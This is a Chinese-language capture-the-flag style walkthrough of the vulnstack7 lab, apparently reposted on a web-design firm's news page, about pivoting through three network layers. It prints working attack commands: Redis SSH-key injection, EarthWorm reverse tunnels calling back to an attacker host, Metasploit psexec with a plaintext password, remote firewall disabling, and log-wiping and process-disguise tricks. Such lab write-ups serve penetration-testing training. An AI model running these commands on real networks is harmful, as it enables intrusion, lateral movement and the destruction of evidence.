资讯动态

红日靶场vulnstack7通关笔记:我是如何用EarthWorm和Proxychains打通三层内网的

发布时间:2026/10/2 23:37:51 来源:尧图企业网站定制
红日靶场vulnstack7三层内网渗透实战EarthWorm与Proxychains的协同艺术当渗透测试遇到多层隔离网络时传统的扫描攻击手段往往束手无策。本文将分享如何通过工具链组合突破三层网络隔离的完整过程重点解析EarthWorm的多模式代理与Proxychains的流量转发技术在实际场景中的协同应用。1. 环境拓扑与突破路径设计红日vulnstack7靶场构建了一个典型的企业级三层网络架构DMZ区Ubuntu服务器192.168.1.6暴露22/80/81/6379端口第二层网络Ubuntu192.168.52.20与Windows 7192.168.52.30组成办公区第三层网络域控制器192.168.93.30与终端192.168.93.40构成核心区突破路径的关键在于通过Redis未授权访问获取DMZ区立足点利用Laravel RCE漏洞建立第二层网络通道组合代理工具穿透至第三层域环境# 网络拓扑简化示意 ---------------- ------------------- ------------------- | Kali攻击机 | --- | DMZ区Ubuntu(1.6) | --- | 第二层网络(52.x) | | (192.168.1.9)| | 双网卡:1.6/52.10 | | 双网卡:52.x/93.x | ---------------- ------------------- ------------------- | v ------------------- | 第三层网络(93.x) | | 单网卡:93.x | -------------------2. 第一层突破DMZ区入口获取2.1 Redis未授权利用实战发现6379端口开放且无认证时采用SSH公钥注入方式# 生成密钥对 ssh-keygen -t rsa -f /tmp/redis_key (echo -e \n\n; cat /tmp/redis_key.pub; echo -e \n\n) key.txt # 通过Redis写入authorized_keys cat key.txt | redis-cli -h 192.168.1.6 -x set ssh_key redis-cli -h 192.168.1.6 EOF config set dir /root/.ssh config set dbfilename authorized_keys save EOF关键细节密钥文件首尾需添加换行符避免数据污染Redis保存路径必须与目标SSH配置一致写入后立即测试连接避免权限变更2.2 内网探测与代理节点选择登录DMZ主机后通过以下命令发现内网线索# 查看网络配置 ip addr show | grep inet netstat -tulnp | grep -v 127.0.0.1 # 检查Nginx转发规则 grep -r proxy_pass /etc/nginx/发现关键信息81端口流量被转发至192.168.52.20主机存在52.10网卡确认第二层网络存在3. 第二层渗透代理隧道构建3.1 EarthWorm反向代理配置采用rcsocks/rssocks模式建立反向代理# 攻击机启动接收端 ./ew -s rcsocks -l 1080 -e 1234 # DMZ区启动服务端 nohup ./ew -s rssocks -d 192.168.1.9 -e 1234 参数解析参数作用典型值-s指定运行模式rcsocks/rssocks-l本地监听端口1080-e通信加密端口1234-d回连目标地址攻击机IP3.2 Proxychains多工具协同配置/etc/proxychains4.conf[ProxyList] socks5 127.0.0.1 1080应用场景示例# Nmap扫描通过代理 proxychains nmap -Pn -sT -sV 192.168.52.20 # Metasploit路由添加 route add 192.168.52.0/24 1注意TCP扫描(-sT)必须用于代理环境SYN扫描(-sS)会失败4. 第三层穿透多级代理架构4.1 三级网络路由方案graph LR A[Kali] --|1080-1234| B[DMZ] B --|1235-999| C[Win7] C -- D[域控93.30]具体实现步骤攻击机启动lcx_listen./ew -s lcx_listen -l 1090 -e 1235第二层Windows启用ssocksdew_for_Win.exe -s ssocksd -l 999DMZ区建立中转./ew -s lcx_slave -d 192.168.1.9 -e 1235 -f 192.168.52.30 -g 9994.2 域环境横向移动获取域管理员凭证后利用psexec模块攻击域控use exploit/windows/smb/psexec setg Proxies socks5:127.0.0.1:1090 set RHOSTS 192.168.93.30 set SMBUser administrator set SMBPass Whoami2021 run遇到防火墙时的解决方案通过已有会话远程关闭防火墙netsh advfirewall set allprofiles state off或使用SC创建服务执行sc \\192.168.93.30 create fwdown binpath netsh advfirewall set allprofiles state off sc \\192.168.93.30 start fwdown5. 工具链深度优化5.1 EarthWorm模式选型指南模式适用场景网络要求典型命令rcsocks反向代理接收端攻击机需可达./ew -s rcsocks -l 1080 -e 1234rssocks反向代理服务端可出网./ew -s rssocks -d [IP] -e 1234lcx_listen端口转发监听端中转节点需可达./ew -s lcx_listen -l 1090 -e 1235lcx_slave端口转发连接端双跳板间需互通./ew -s lcx_slave -d [IP1] -e 1235 -f [IP2] -g 999ssocksd正向Socks代理目标可直连./ew -s ssocksd -l 9995.2 稳定性增强技巧会话持久化# Linux系统 nohup ./ew -s rssocks -d 192.168.1.9 -e 1234 # Windows系统 start /b ew_for_Win.exe -s ssocksd -l 999流量加密建议# 结合OpenSSL加密通道 mkfifo /tmp/fifo ./ew -s rssocks -d 192.168.1.9 -e 1234 | openssl enc -aes-256-cbc -pass pass:密钥 -base64 /tmp/fifo异常处理方案代理中断时自动重连脚本while true; do ./ew -s lcx_slave -d 192.168.1.9 -e 1235 -f 192.168.52.30 -g 999 sleep 10 done6. 防御对抗与痕迹清理6.1 入侵检测规避措施日志干扰# 清除Redis操作痕迹 redis-cli -h 192.168.1.6 FLUSHALL # 删除SSH登录记录 echo /var/log/auth.log进程隐藏# 重命名EW进程 mv ew /usr/sbin/sshd-worker6.2 后门清除清单删除~/.ssh/authorized_keys中的注入密钥检查/etc/crontab中的定时任务清理/tmp/目录下的可疑文件恢复防火墙规则netsh advfirewall set allprofiles state on在实际渗透测试中这种多层网络穿透方案的成功率取决于对网络架构的准确判断和工具链的灵活组合。记得在一次真实项目中由于目标网络存在流量审计设备常规的EW代理连接会被立即阻断后来改用LCX隧道 over HTTPS才最终突破防线。每个网络环境都有其独特性工具只是手段对网络协议和架构的理解才是核心。

读完文章,也想定制专属网站?

尧图设计师 24 小时内与您沟通定制方案

免费获取报价 →
↑